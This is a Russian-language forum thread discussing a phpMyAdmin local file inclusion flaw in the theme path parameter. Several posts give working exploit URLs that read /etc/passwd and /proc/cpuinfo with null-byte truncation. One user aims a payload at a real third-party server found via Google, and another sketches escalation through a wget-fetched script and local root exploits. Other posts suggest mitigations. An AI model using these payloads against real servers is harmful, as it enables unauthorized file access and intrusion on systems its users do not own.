LINUX.ORG.RU

http://[HOST]/[DIR]/css/phpmyadmin.css.pрp?GLOBALS[cfg][ThemePath]=/etc/passwd

Это чтоже, можно получается любую переменную в GLOBALS переписать? Офигеть!

anonymous
()

Разве это серьезная уязвимость?

Разве это серьезная уязвимость?
Те кто ставят/позволяют ставить phpMyAdmin позволяют и доступ к локальным файлам.

anonymous
()

А у меня что-то не получается получить хотя-бы /etc/passwd вышеописанным способом. Выдает все время css текст и никаких намеков на включение файлов. Версия phpAdmin'a 2.5.1, проверял под IE.

knoppix
()
Ответ на: комментарий от delta9

И у меня ни фига. phpMyAdmin 2.5.6. Но там написано, что нужен 2.6.1. Наверное, этот баг в наших версиях не поддерживается... ;-)

atrus ★★★★★
()
Ответ на: комментарий от anonymous

>> а если у меня доступ к phpadmin закрыт htaccess'ом ?

Тогда, соответственно, у тебя все в порядке.


А для тех, кто не верит, что уязвимость есть, вот пример:
http://www.anotherlight.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][Theme Path]=/proc/cpuinfo%00&theme=y0%20ls%20-la%00

(первый попавшийся сервак из гугля)

n1tro
()

Ссаныч стал script-kiddie?

del
()
Ответ на: комментарий от n1tro

Хм, только здесь и сейчас я прочитал, что phpMyAdmin можно выставить в интернет (сам бы никогда не догадался :) -- век живу, век учусь.

Lumi ★★★★★
()
Ответ на: комментарий от Lumi

да ладно вые**ваться - полно в инете серваков в phpMyAdmin. Смотри дальше своего носа дружок. Все с понтом крутаны ха ха ;)

orb
()
Ответ на: комментарий от n1tro

> А для тех, кто не верит, что уязвимость есть, вот пример

И? Насколько я понимаю, он должен был выдать мне информацию о процессоре? Но я вижу только css'ку... ;-P

atrus ★★★★★
()

Во первых: .htaccess, именно он а не стандартная приблуда авторизации phpMyAdmin'а

Во вторых: register_globals нахер офф

В третьих: safe_mode

и всё пучком ;)

unReal
()

Скажите а кто этот phpMyAdmin использует и для чего ? В упор не понимаю на кой он нужен !

anonymous
()
Ответ на: комментарий от Nik33

>Да нет, сейчас робит.. вы бы это хоть написали подопытному, какой >уязвисости он подвержен..
С другой стороны тот-же /etc/shadow он не показывает те запущен не от рута, тогда что плохого могут сделать ? Максимум сайт задефейсить систему все равно не порушат. Вообщем это к необходимости иметь бекап и вовремя обновлятся.

anonymous
()

хотя если поискать наверняка можно найти кого-то у кого из под рута оно пущено...

anonymous
()
Ответ на: комментарий от anonymous

>Скажите а кто этот phpMyAdmin использует и для чего ? В упор не понимаю на кой он нужен !

Чтобы клиент, отдавший свои кровные 10.95$ мог получить доступ к MySQL-базам в привычном ему виде -- через браузер. Интересно, CPanel скоро эту дрянь обновит или полезней будет превентивно пропатчить самостоятельно?..

dsx
()
Ответ на: комментарий от dsx

>Чтобы клиент, отдавший свои кровные 10.95$ мог получить доступ к >MySQL-базам в привычном ему виде -- через браузер.
Те для хостингов получается. А шелл обычно такие ребята дают ? Я лучше уж через mysql консоль поработаю :) Удаленно-то база надеюсь не доступна :)

anonymous
()
Ответ на: комментарий от anonymous

>> С другой стороны тот-же /etc/shadow он не показывает те запущен не >> от рута, тогда что плохого могут сделать ? Максимум сайт >> задефейсить систему все равно не порушат. Вообщем это к необходимости >> иметь бекап и вовремя обновлятся.

Погляди немного дальше свое носа и ты поймешь, что на твоем серваке кто-то ненпрягаясь сможет получить root ;) Оссобенно в свете в последнее время локальных уязвимостей в линуксе ;)

BSDun
()
Ответ на: комментарий от BSDun

да, никто не мешает через wget закачать скрипт на перле, забиндить порт и использовать кучу local root эксплоитов ;)

вот тут и видна разница между linux и *bsd

x97Rang ★★★
()
Ответ на: комментарий от BSDun

>твоем серваке кто-то ненпрягаясь сможет получить root ;)
На моем врядли, я в отличие от него постоянно обновляюсь.

anonymous
()

не работает!

phpMyAdmin-2.5.6

theserg ★★★
()
Ответ на: комментарий от Adjkru

Работает phpMyadmin 2.6.1-rc2. apache 1.3.31/win32 php/4.3.10

сначала сделал echo hacked > z:/etc/passwd

дал запрос http://localhost/Tools/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath] =z:/etc/passwd%00&theme=passwd%00

- это вывело hacked, а ниже - css

Adjkru ★★★★★
()
Ответ на: комментарий от x97Rang

>> да, никто не мешает через wget закачать скрипт на перле, забиндить
>> порт и использовать кучу local root эксплоитов ;)

>> вот тут и видна разница между linux и *bsd

Да ты что ;)))))) Интересно, каким образом через эту уязвимость ты будешь использовать вгет?

n1tro
()
Ответ на: комментарий от soko1

Да и вообще, народ... кончайте мучать сервер :)))) я же ради примера привел :)

n1tro
()
Ответ на: комментарий от n1tro

я один раз лазил в ядро freebsd, даже что-то менял 8). делал так чтобы запуская progra.exe запускался wine. ничего не получилось, да и есть такое уже где-то видел...

Вот если внутри ядра прописать выполение команды при открытии файла - тогда можно и похакать =)

Adjkru ★★★★★
()
Ответ на: комментарий от Adjkru

Не, ну вы меня поражаете :))) это какой же администратор будет у себя на сервере заниматься подобной хренью? :) Тогда сразу, чтобы атакующий особо не замарачивался, отключить использование shadow и все ;)

n1tro
()
Ответ на: комментарий от n1tro

неа, лучше отключить хеши и перекомпилить что-то если сразу не поддается =)

Adjkru ★★★★★
()
Ответ на: комментарий от Adjkru

>я один раз лазил в ядро freebsd, даже что-то менял 8). делал так чтобы запуская progra.exe запускался wine. ничего не получилось, да и есть такое уже где-то видел...

ага, binfmt_misc в linux :)

borisych ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.